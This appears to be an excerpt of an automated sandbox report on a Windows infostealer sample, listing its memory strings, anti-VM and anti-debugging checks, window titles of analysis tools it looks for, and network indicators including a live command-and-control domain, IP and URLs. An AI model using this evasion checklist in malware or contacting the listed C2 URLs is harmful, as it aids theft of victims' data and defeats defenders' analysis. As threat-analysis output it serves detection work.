Source: mBr65h6L4w.exe, 00000001.00000002.2391817963.0000000000F01000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: mBr65h6L4w.exe, 00000001.00000002.2393145911.00000000011F0000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: mBr65h6L4w.exe, 00000001.00000003.2242512402.0000000006F21000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlO#<y
Source: mBr65h6L4w.exe, 00000001.00000002.2394416036.0000000001CCF000.00000004.00000020.00020000.00000000.sdmp, mBr65h6L4w.exe, 00000001.00000003.2354059020.0000000001CB3000.00000004.00000020.00020000.00000000.sdmp, mBr65h6L4w.exe, 00000001.00000003.2354350025.0000000001CBF000.00000004.00000020.00020000.00000000.sdmp, mBr65h6L4w.exe, 00000001.00000003.2354324015.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, mBr65h6L4w.exe, 00000001.00000003.2354474647.0000000001CCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\mBr65h6L4w.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\mBr65h6L4w.exe File opened: NTICE
Source: C:\Users\user\Desktop\mBr65h6L4w.exe File opened: SICE
Source: C:\Users\user\Desktop\mBr65h6L4w.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00B79980 rdtsc 1_2_00B79980
Source: mBr65h6L4w.exe, mBr65h6L4w.exe, 00000001.00000002.2393145911.00000000011F0000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: mBr65h6L4w.exe, 00000001.00000003.2211257540.0000000007930000.00000004.00001000.00020000.00000000.sdmp, mBr65h6L4w.exe, 00000001.00000002.2391817963.0000000000F01000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: procmon.exe
Source: mBr65h6L4w.exe, 00000001.00000003.2211257540.0000000007930000.00000004.00001000.00020000.00000000.sdmp, mBr65h6L4w.exe, 00000001.00000002.2391817963.0000000000F01000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: wireshark.exe

Stealing of Sensitive Information
barindex
Infostealer behavior detected
Source: Signature Results Signatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global traffic TCP traffic: 192.168.2.6:49740 -> 5.101.3.217:80
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
34.226.108.155
 httpbin.org United States
14618 AMAZON-AESUS false
5.101.3.217
 home.fiveth5ht.top Russian Federation
34665 PINDC-ASRU false

Contacted Domains

Name IP Active
home.fiveth5ht.top 5.101.3.217 true
httpbin.org 34.226.108.155 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0 true
  • Avira URL Cloud: safe
 unknown
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 true
  • Avira URL Cloud: safe
 unknown
https://httpbin.org/ip false
    		high